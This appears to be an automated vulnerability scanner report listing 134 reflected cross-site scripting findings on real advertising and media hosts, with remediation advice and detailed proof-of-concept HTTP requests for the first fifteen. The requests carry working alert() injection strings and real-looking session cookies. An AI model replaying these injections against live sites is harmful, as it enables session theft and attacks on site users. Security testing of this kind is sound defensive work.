There are 134 instances of this issue:

http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]
http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 3]
http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [sz parameter]
http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 2]
http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 3]
http://a.collective-media.net/adj/idgt.curse/idgtcoad [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/idgt.curse/idgtcoad [sec parameter]
http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 2]
http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 3]
http://a.collective-media.net/adj/q1.boston/life [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.boston/life [sz parameter]
http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 2]
http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 3]
http://a.collective-media.net/adj/q1.q.boston/be_life [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.q.boston/be_life [sz parameter]
http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]
http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [sz parameter]
http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter]
http://a.netmng.com/hic/ [click parameter]
http://a.netmng.com/hic/ [click parameter]
http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [u parameter]
http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18 [sz parameter]
http://ad.doubleclick.net/adj/lfs2.lifescript/conditions [path parameter]
http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [pg parameter]
http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [pg parameter]
http://ad.turn.com/server/pixel.htm [fpid parameter]
http://ad.turn.com/server/pixel.htm [sp parameter]
http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
http://ads.adap.tv/beacons [callback parameter]
http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [AdId parameter]
http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]
http://api.bizographics.com/v1/profile.json [&callback parameter]
http://api.bizographics.com/v1/profile.json [api_key parameter]
http://api.bizographics.com/v1/profile.redirect [api_key parameter]
http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
http://api.chartbeat.com/toppages/ [jsonp parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard [mbox parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [apui parameter]
http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer [trurl parameter]
http://dinclinx.com/ [name of an arbitrarily supplied request parameter]
http://event.adxpose.com/event.flow [uid parameter]
http://home.myyearbook.com/Countries [callback parameter]
http://home.myyearbook.com/feed/giftFeedItems [REST URL parameter 2]
http://home.myyearbook.com/feed/myMagFeedItems [REST URL parameter 2]
http://home.myyearbook.com/feed/tvFeedItems [REST URL parameter 2]
http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
http://ib.adnxs.com/ab [ccd parameter]
http://ib.adnxs.com/ab [cnd parameter]
http://ib.adnxs.com/ab [referrer parameter]
http://ib.adnxs.com/ab [tt_code parameter]
http://ib.adnxs.com/ptj [redir parameter]
http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpck parameter]
http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpvc parameter]
http://jlinks.industrybrains.com/jsct [ct parameter]
http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://km.support.apple.com/kb/index [doctype parameter]
http://lifescript.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
http://mm.chitika.net/minimall [callback parameter]
http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
http://services.social.microsoft.com/Search/Data/Terms [callback parameter]
http://services.social.microsoft.com/Search/Data/Terms [t parameter]
http://sgy.sitescout.com/tag.jsp [h parameter]
http://sgy.sitescout.com/tag.jsp [pid parameter]
http://sgy.sitescout.com/tag.jsp [w parameter]
http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]
http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]
http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]
http://sm6.sitemeter.com/js/counter.asp [site parameter]
http://sm6.sitemeter.com/js/counter.js [site parameter]
http://social.msdn.microsoft.com/Search/en-US [REST URL parameter 2]
http://sr2.liveperson.net/visitor/addons/deploy2.asp [site parameter]
http://syn.5min.com/handlers/SenseHandler.ashx [name of an arbitrarily supplied request parameter]
http://widgets.klout.com/ [from parameter]
http://widgets.klout.com/ [name of an arbitrarily supplied request parameter]
http://www.apple.com/global/scripts/search_featured.php [q parameter]
http://www.lijit.com/delivery/fp [n parameter]
http://www.myyearbook.com/advertising/default.php [n parameter]
http://www.myyearbook.com/advertising/default.php [name of an arbitrarily supplied request parameter]
http://www.myyearbook.com/advertising/default.php [section parameter]
http://www.myyearbook.com/advertising/default.php [section parameter]
http://www.myyearbook.com/advertising/default.php [site parameter]
http://www.myyearbook.com/advertising/default.php [size parameter]
http://www.myyearbook.com/advertising/default.php [sub parameter]
http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js [d parameter]
http://www.paloaltonetworks.com/cam/switch/index.php [name of an arbitrarily supplied request parameter]
http://www.paloaltonetworks.com/cam/switch/index.php [ts parameter]
http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]
http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]
http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]
http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]
http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]
http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]
http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]
http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]
http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]
http://www.silverpop.com/preferences_sf/login.sp [failureHandler parameter]
http://www.silverpop.com/preferences_sf/login.sp [successHandler parameter]
http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [&fld[] parameter]
http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [fld[] parameter]
http://api.bizographics.com/v1/profile.json [Referer HTTP header]
http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]
http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p101983071 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p110040101 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p87077372 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p98294060 cookie]
http://seg.sharethis.com/getSegment.php [__stid cookie]
https://servicing.capitalone.com/c1/login.aspx [VS_COOKIE cookie]
http://sm6.sitemeter.com/js/counter.asp [IP cookie]
http://sm6.sitemeter.com/js/counter.js [IP cookie]
http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220 [meld_sess cookie]
http://www.myyearbook.com/advertising/default.php [MYB_TARGET cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.yearbook/ford_ron_071911

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73883'-alert(1)-'aea0893a815 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.yearbook73883'-alert(1)-'aea0893a815/ford_ron_071911;sz=300x250;ord=1520731557? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

3.2. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.yearbook/ford_ron_071911

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bcfc'-alert(1)-'53d92bb185c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.yearbook/ford_ron_0719114bcfc'-alert(1)-'53d92bb185c;sz=300x250;ord=1520731557? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

3.3. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.yearbook/ford_ron_071911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2919b'-alert(1)-'05bcbf3a0e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.yearbook/ford_ron_071911;sz=300x250;ord=1520731557?&2919b'-alert(1)-'05bcbf3a0e5=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

3.4. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.yearbook/ford_ron_071911

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f83'-alert(1)-'2441cffc4b5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.yearbook/ford_ron_071911;sz=300x250;ord=1520731557?d5f83'-alert(1)-'2441cffc4b5 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

3.5. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/idgt.curse/idgtcoad

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee038'-alert(1)-'ff9be4c80be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/idgt.curseee038'-alert(1)-'ff9be4c80be/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

3.6. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/idgt.curse/idgtcoad

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d26e'-alert(1)-'fa2fdef4e1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/idgt.curse/idgtcoad7d26e'-alert(1)-'fa2fdef4e1e;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

3.7. http://a.collective-media.net/adj/idgt.curse/idgtcoad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/idgt.curse/idgtcoad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b429'-alert(1)-'c56bbbc539a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790?&8b429'-alert(1)-'c56bbbc539a=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

3.8. http://a.collective-media.net/adj/idgt.curse/idgtcoad [sec parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/idgt.curse/idgtcoad

Issue detail

The value of the sec request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b48'-alert(1)-'d9ff14e8a82 was submitted in the sec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790?48b48'-alert(1)-'d9ff14e8a82 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

3.9. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.boston/life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8194'-alert(1)-'c19d349c966 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bostonb8194'-alert(1)-'c19d349c966/life;sz=728x90;click0=;ord=1100566473? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

3.10. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.boston/life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b33bd'-alert(1)-'80c1110add4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.boston/lifeb33bd'-alert(1)-'80c1110add4;sz=728x90;click0=;ord=1100566473? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

3.11. http://a.collective-media.net/adj/q1.boston/life [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.boston/life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d913'-alert(1)-'3feb78746bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.boston/life;sz=728x90;click0=;ord=1100566473?&1d913'-alert(1)-'3feb78746bb=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

3.12. http://a.collective-media.net/adj/q1.boston/life [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.boston/life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56604'-alert(1)-'a336edbc83a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.boston/life;sz=728x90;click0=;ord=1100566473?56604'-alert(1)-'a336edbc83a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

3.13. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 716af'-alert(1)-'eaa09b6c518 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston716af'-alert(1)-'eaa09b6c518/be_life;sz=728x90;ord=971628896? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

3.14. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be8ae'-alert(1)-'98331bd179c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/be_lifebe8ae'-alert(1)-'98331bd179c;sz=728x90;ord=971628896? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

3.15. http://a.collective-media.net/adj/q1.q.boston/be_life [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e409'-alert(1)-'2bccaf234b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/be_life;sz=728x90;ord=971628896?&5e409'-alert(1)-'2bccaf234b5=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
